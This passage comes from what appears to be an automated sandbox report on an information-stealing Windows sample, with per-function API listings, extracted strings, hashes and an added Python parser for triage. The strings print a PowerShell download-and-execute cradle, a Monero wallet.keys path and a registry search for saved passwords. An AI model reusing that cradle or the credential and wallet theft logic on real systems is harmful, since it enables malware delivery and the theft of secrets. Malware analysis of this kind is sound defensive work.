                                • Opcode Fuzzy Hash: ccbc9e0320f5f9ea425136dffc4a0e1f5f5271ae1a030f69f62fb29b4ce00a55
                                • Instruction Fuzzy Hash: 800162B5A04308BBFB00DBE4DC4EFADBBB8EB48702F108458FA45D72D0D679A9448B55
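The per-function API listings in this section are the most useful part of the report for a triager: the registry-value walk that StrStrA-searches for "Password" at 004F7314, the GlobalMemoryStatusEx/"%d MB" memory-size check at 00508130, the WinINet download-to-file routine at 004F610F, the in-memory fetch into a 0x05F5E0FF-byte heap buffer at 004F4FCA, and the HKLM lookups that read the OS version (the "Windows 11" string and CurrentBuildNumber). They are only informative if the call sequence and the raw hexadecimal arguments are read together, since 80000001 vs 80000002 and 00020019 vs 00020119 change the meaning of an otherwise identical RegOpenKeyExA. The following Python is an added example, not Joe Sandbox code and not code from the analysed sample: it parses lines in the report's `• API.MODULE(args), ref: ADDR` format (including the "Part of subcall function" prefix), names the Win32 constants in a few argument positions (registry hive and access mask, WinINet flags, CreateFile access and disposition), pulls out the literal string arguments, and tags each function with the capability its sequence implies. The input is constructed by copying lines from three of the listings above; the capability rules and tag names are the example's own heuristics, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox per-function "APIs" listings and tag the capability each call sequence implies (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed input: lines copied from three function listings in this report.
SAMPLE = {
    "registry_password_search": """
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004F73B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004F740D
""",
    "downloader": """
  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
• InternetOpenA.WININET(00510DF7,00000001,00000000,00000000,00000000), ref: 004F610F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004F618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004F61B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 004F61DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004F620A
""",
    "os_version": """
• RegOpenKeyExA.ADVAPI32(80000002,012CB738,00000000,00020119,005076B9), ref: 0050775B
• RegQueryValueExA.ADVAPI32(005076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0050777A
• RegCloseKey.ADVAPI32(005076B9), ref: 00507784
""",
}

# "• API.MODULE(args), ref: ADDR", optionally prefixed by the report's subcall marker.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple          # argument tokens exactly as the report printed them (split on commas)
    ref: int             # call-site address
    subcall: int | None  # callee address when the line came from a subcall

def parse_api_line(line: str) -> ApiCall | None:
    m = API_LINE.match(line)
    if not m:
        return None  # headings such as "Strings" or "Memory Dump Source" are skipped
    args = tuple(t.strip() for t in m["args"].split(",")) if m["args"] else ()
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)

def parse_block(text: str) -> list[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c]
def hexarg(tok: str) -> int | None:
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else None
def string_args(calls: list[ApiCall]) -> list[str]:
    """Literal strings captured as arguments (value names, search markers)."""
    return [t for c in calls for t in c.args if t != "?" and hexarg(t) is None]

# Win32 constants for the argument positions worth reading by eye; composite
# names first so that 0x20119 decodes as KEY_READ | KEY_WOW64_64KEY.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x0100, "KEY_WOW64_64KEY")]
INET_FLAGS = [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
              (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
FILE_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}

def decode_mask(value: int, table: list[tuple[int, str]]) -> list[str]:
    names, rest = [], value
    for bits, name in table:
        if rest & bits == bits:
            names.append(name)
            rest &= ~bits
    return names + ([f"0x{rest:X}"] if rest else [])  # leftover bits stay visible

def decode_call(c: ApiCall) -> dict:
    """Name the constants in the positions that matter for three APIs seen in the listings."""
    a = [hexarg(t) for t in c.args]
    if c.api == "RegOpenKeyExA" and len(a) >= 4 and a[3] is not None:
        return {"hive": HIVES.get(a[0], "handle"), "access": decode_mask(a[3], KEY_ACCESS)}
    if c.api == "InternetOpenUrlA" and len(a) >= 5 and a[4] is not None:
        return {"flags": decode_mask(a[4], INET_FLAGS)}
    if c.api == "CreateFileA" and len(a) >= 5 and a[1] is not None:
        return {"access": decode_mask(a[1], FILE_ACCESS), "disposition": DISPOSITION.get(a[4], "?")}
    return {}

# (tag, APIs that must all be present, APIs that must be absent); the tags and
# rules are this example's own heuristics, not Joe Sandbox signatures.
RULES = [
    ("downloads a URL and writes it to disk", {"InternetOpenUrlA", "InternetReadFile", "CreateFileA", "WriteFile"}, set()),
    ("downloads a URL into memory", {"InternetOpenUrlA", "InternetReadFile"}, {"WriteFile"}),
    ("searches registry values for a string", {"RegEnumValueA", "StrStrA"}, set()),
    ("reads a registry value", {"RegOpenKeyExA", "RegQueryValueExA"}, {"RegEnumKeyExA"}),
    ("queries physical memory size (common sandbox fingerprint)", {"GlobalMemoryStatusEx"}, set()),
]

def classify(calls: list[ApiCall]) -> list[str]:
    names = {c.api for c in calls}
    return [tag for tag, need, deny in RULES if need <= names and not deny & names]

if __name__ == "__main__":
    for name, text in SAMPLE.items():
        calls = parse_block(text)
        print(name, classify(calls), string_args(calls), [decode_call(c) for c in calls if decode_call(c)])
```

Two caveats when reading the decoded output against the listings above. Joe Sandbox prints whatever was on the stack at call time, so an argument that should be a string pointer (012DD830 in the "Windows 11" function, 012CB738 as the subkey path) is the address of a string decrypted at runtime, and the report's "String ID" field, not the argument list, is where that string is recoverable. And the flag value 04000100 passed to InternetOpenUrlA in the in-memory fetch at 004F5011 decodes to INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, i.e. a request that must not be served from or written to the WinINet cache, which is the expected shape for fetching fresh C2 configuration rather than a cacheable download.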
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0050773B
                                • RegOpenKeyExA.ADVAPI32(80000002,012CB738,00000000,00020119,005076B9), ref: 0050775B
                                • RegQueryValueExA.ADVAPI32(005076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0050777A
                                • RegCloseKey.ADVAPI32(005076B9), ref: 00507784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: bb6147bc456d435e74eca7d3916afac2834369bd917e5d78535e3b3565ed4244
                                • Instruction ID: 5e24f252165491d01a4b146547cfe97effd9b0dab34a75f9e2655c16ab56e2d8
                                • Opcode Fuzzy Hash: bb6147bc456d435e74eca7d3916afac2834369bd917e5d78535e3b3565ed4244
                                • Instruction Fuzzy Hash: CB0167B5A40308BBEB00DBE0DC4AFAEB7B8FB48701F008558FA45A7281D67465408B55
                                APIs
                                • CreateFileA.KERNEL32(:P,80000000,00000003,00000000,00000003,00000080,00000000,?,00503AEE,?), ref: 005092FC
                                • GetFileSizeEx.KERNEL32(000000FF,:P), ref: 00509319
                                • CloseHandle.KERNEL32(000000FF), ref: 00509327
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :P$:P
                                • API String ID: 1378416451-3735559389
                                • Opcode ID: 0641e2be534480ef8beb32e2c67ba189c40cb593acfa152deb038a40203f88b7
                                • Instruction ID: 69351ad83931a66b1d25cadfd91bc840e5787cedffb9752c8c3d8ca6ca332e5d
                                • Opcode Fuzzy Hash: 0641e2be534480ef8beb32e2c67ba189c40cb593acfa152deb038a40203f88b7
                                • Instruction Fuzzy Hash: 19F04F75E44208BBEB10DFB4DC4AF9E7BB9FB48711F10CA54BA51A72C4D674A6018F44
                                APIs
                                • memset.MSVCRT ref: 005040D5
                                • RegOpenKeyExA.ADVAPI32(80000001,012DD618,00000000,00020119,?), ref: 005040F4
                                • RegQueryValueExA.ADVAPI32(?,012DDD88,00000000,00000000,00000000,000000FF), ref: 00504118
                                • RegCloseKey.ADVAPI32(?), ref: 00504122
                                • lstrcat.KERNEL32(?,00000000), ref: 00504147
                                • lstrcat.KERNEL32(?,012DDBF0), ref: 0050415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: 35c830a17d2669b93c5d5301af7ddda61a36ad9217097052a373fbdaa4745c47
                                • Instruction ID: 2b7f16e2c7d4e2530c5f70d4aeaa5a2aa6d0f668a6f7938bcffce250bb48cf23
                                • Opcode Fuzzy Hash: 35c830a17d2669b93c5d5301af7ddda61a36ad9217097052a373fbdaa4745c47
                                • Instruction Fuzzy Hash: 614187B6900108BBDB14EBA0DC4BFFE773DBB88300F40855DB75556191EA799B888B92
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                • LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: cb75a940647557fc43dff5cd3f2c7c3e45e1bbc9246ab60b7a5ccdbc945ee0c0
                                • Instruction ID: b045629d737e85f6edd6e38dc4e54b07c35c7e5173d08a52f7277037c5daa2ac
                                • Opcode Fuzzy Hash: cb75a940647557fc43dff5cd3f2c7c3e45e1bbc9246ab60b7a5ccdbc945ee0c0
                                • Instruction Fuzzy Hash: 5031D3B4E00209EFDB14CF94C986BAE77B5BF48341F108159E911A7390D779AA41CFA6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: bfc781a08eef358cdea8550022e732696b2f501931a26b78e21fcfc2ec218076
                                • Instruction ID: 8dba3c01117ef544ca6ba1463886a169f3f1ec1c5463d46a806a4f60832cafa5
                                • Opcode Fuzzy Hash: bfc781a08eef358cdea8550022e732696b2f501931a26b78e21fcfc2ec218076
                                • Instruction Fuzzy Hash: 7841E4B110079C5EDB218B248D84BFFBFE8AF46704F1449E8E98A861C2D271AA448F64
                                APIs
                                • lstrcat.KERNEL32(?,012DDCE0), ref: 005047DB
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504801
                                • lstrcat.KERNEL32(?,?), ref: 00504820
                                • lstrcat.KERNEL32(?,?), ref: 00504834
                                • lstrcat.KERNEL32(?,012CAE88), ref: 00504847
                                • lstrcat.KERNEL32(?,?), ref: 0050485B
                                • lstrcat.KERNEL32(?,012DD538), ref: 0050486F
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508D90: GetFileAttributesA.KERNEL32(00000000,?,004F1B54,?,?,0051564C,?,?,00510E1F), ref: 00508D9F
                                  • Part of subcall function 00504570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00504580
                                  • Part of subcall function 00504570: RtlAllocateHeap.NTDLL(00000000), ref: 00504587
                                  • Part of subcall function 00504570: wsprintfA.USER32 ref: 005045A6
                                  • Part of subcall function 00504570: FindFirstFileA.KERNEL32(?,?), ref: 005045BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 180311d333a7f3927bb327ea0024f666143b46b096d912a9aabe600746134678
                                • Instruction ID: aaf25c2f52dfabe06995324aeb26521d4b5c303aaeff5d55d5078cf93b485cd0
                                • Opcode Fuzzy Hash: 180311d333a7f3927bb327ea0024f666143b46b096d912a9aabe600746134678
                                • Instruction Fuzzy Hash: 643152B2900208A7DB11FBB0DC8AEED777CBB98700F404989B79596091EE74D6898B95
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00502D85
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00502CC4
                                • ')", xrefs: 00502CB3
                                • <, xrefs: 00502D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00502D04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 8022f7195e1371615938293f169d32a9aeff668ed4a519b6ed2fc2b48c66f659
                                • Instruction ID: f78273f8ecfcd4313438c4b49f70407fb7e08c2112237fca13dda14eb0f2306c
                                • Opcode Fuzzy Hash: 8022f7195e1371615938293f169d32a9aeff668ed4a519b6ed2fc2b48c66f659
                                • Instruction Fuzzy Hash: C041AD719102099AEB14EBA0C89AFEDBF78BF54300F408519F516AA1D1DF746A8ACF91
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004F9F41
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 8ec11bb8a1572481500279c24468443ce5f1e490da6f863dff29d757855dbdf2
                                • Instruction ID: df6d2e65b0be1e8340a5f761ebe1ec8969e45cbfb3d827c88bb3a7bb6000e5b2
                                • Opcode Fuzzy Hash: 8ec11bb8a1572481500279c24468443ce5f1e490da6f863dff29d757855dbdf2
                                • Instruction Fuzzy Hash: 8E610C71A1024CEFDB14EFA4DC96FED7B75BF84304F008118EA0A5B291EB746A46CB56
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • memset.MSVCRT ref: 0050716A
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0050718C
                                • sP, xrefs: 005072AE, 00507179, 0050717C
                                • sP, xrefs: 00507111
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemset
                                • String ID: sP$sP$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 4047604823-3565788713
                                • Opcode ID: e6e9bd7fbddf9970db07724e214f22b6b7b055dcd0c99175ac86be17036d36f6
                                • Instruction ID: b4f8c86632e5abeeaea904b5dfe1d25147ec0efca8b340dfe9366d806349c020
                                • Opcode Fuzzy Hash: e6e9bd7fbddf9970db07724e214f22b6b7b055dcd0c99175ac86be17036d36f6
                                • Instruction Fuzzy Hash: 6D517DB0D0421EABDB14EB90DC85BEEBB74BF58304F5084A8E615761C1EB746E88CF58
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,012CBC08,00000000,00020119,?), ref: 00507E5E
                                • RegQueryValueExA.ADVAPI32(?,012DD6D8,00000000,00000000,000000FF,000000FF), ref: 00507E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00507E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0092dcb1f4ef202867f5c72b47700688134a39ce425fd23c5fc8acfbb8d96e9e
                                • Instruction ID: 53cd6c21a231cc0a4f458898b8daecef4a12ab7b136fcfd9676024c651162d82
                                • Opcode Fuzzy Hash: 0092dcb1f4ef202867f5c72b47700688134a39ce425fd23c5fc8acfbb8d96e9e
                                • Instruction Fuzzy Hash: 37114CB1A44209FBE700CB94DD4AFBFBBBCFB08B11F108159F605A7280D77868048BA1
                                APIs
                                • StrStrA.SHLWAPI(012DDA70,?,?,?,0050140C,?,012DDA70,00000000), ref: 0050926C
                                • lstrcpyn.KERNEL32(0073AB88,012DDA70,012DDA70,?,0050140C,?,012DDA70), ref: 00509290
                                • lstrlen.KERNEL32(?,?,0050140C,?,012DDA70), ref: 005092A7
                                • wsprintfA.USER32 ref: 005092C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 2652b5b6caaf853618f63a142f90dcc1445166ccddd20c504884d52fc9d9eecb
                                • Instruction ID: 487cc14f86bbe30d4a008eb1181d3464501ba9ef2494991f40a05d16a22ed1dd
                                • Opcode Fuzzy Hash: 2652b5b6caaf853618f63a142f90dcc1445166ccddd20c504884d52fc9d9eecb
                                • Instruction Fuzzy Hash: 7C011AB5500108FFDB04DFECC98AEAE7BB9FB48351F108548F9498B245C639AA40DB95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004F12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004F12F5
                                • RegCloseKey.ADVAPI32(?), ref: 004F12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 01b34146acdf691134ce1317b26fc526facf169167d71b81c492be7ea2c199de
                                • Instruction ID: 4c2e66159eddbc0b93c63aa236aed1bef5e311eed438b8f5fa121e2686ed85c5
                                • Opcode Fuzzy Hash: 01b34146acdf691134ce1317b26fc526facf169167d71b81c492be7ea2c199de
                                • Instruction Fuzzy Hash: 7A0131B9A40208BBEB00DFE0DC8AFAEB7B8EB48701F008159FA4597280D6759A018F55
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00506663
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00506726
                                • ExitProcess.KERNEL32 ref: 00506755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: c5d5e337bb2f2678fd40105cad5de211755d2b1abb08a5a5e8a22bc8af273f1d
                                • Instruction ID: 5e31664a67d1035641b782e2396d5c13f5daff19c6cf7596e4f91ac908a91837
                                • Opcode Fuzzy Hash: c5d5e337bb2f2678fd40105cad5de211755d2b1abb08a5a5e8a22bc8af273f1d
                                • Instruction Fuzzy Hash: 33314DB1901218ABDB14EB50DC8AFDEBB78BF94300F408188F255661D1DF746B48CF5A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00510E28,00000000,?), ref: 0050882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508836
                                • wsprintfA.USER32 ref: 00508850
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 2dc201f1b6455aae33e4205b1b6ac31f57749294a95fa8160a4823f0976087cc
                                • Instruction ID: 23ac964317f978bceec80068538d2d7c9f804dd9b03a3fd544395aecced3a07f
                                • Opcode Fuzzy Hash: 2dc201f1b6455aae33e4205b1b6ac31f57749294a95fa8160a4823f0976087cc
                                • Instruction Fuzzy Hash: 2B2130B1A40204BFEB04DF94DD4AFAEBBB8FB48701F108119F645A72C0C7799900CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0050951E,00000000), ref: 00508D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508D62
                                • wsprintfW.USER32 ref: 00508D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 0e56dc33fbccb107a66819686c560aada2bffd55fbb776ebc6c805501afd7e8d
                                • Instruction ID: f000bb762dc42fd262dde45f4d83cc1fff2f1a5002a3a2050dd71ba7eacf0688
                                • Opcode Fuzzy Hash: 0e56dc33fbccb107a66819686c560aada2bffd55fbb776ebc6c805501afd7e8d
                                • Instruction Fuzzy Hash: FCE086B1A40208FBE700DB94DC0EE9977B8EB04702F004054FD4987280D9755E008B56
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 004FA3FF
                                • lstrlen.KERNEL32(00000000), ref: 004FA6BC
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 004FA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 0c1b3f40f7b32b2aabe5e25ed16686f0443cc02d48b7a763c98aa4e2ce5b47bf
                                • Instruction ID: 93ce80d048d2eab7f52924fe291221c7d6f2eaf2697fa83fc90bab0a93626ecc
                                • Opcode Fuzzy Hash: 0c1b3f40f7b32b2aabe5e25ed16686f0443cc02d48b7a763c98aa4e2ce5b47bf
                                • Instruction Fuzzy Hash: 62E1FC72910209AADB04EBA4DC9AEEE7738BFA4300F50C559F516720D1EF346A49CB66
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
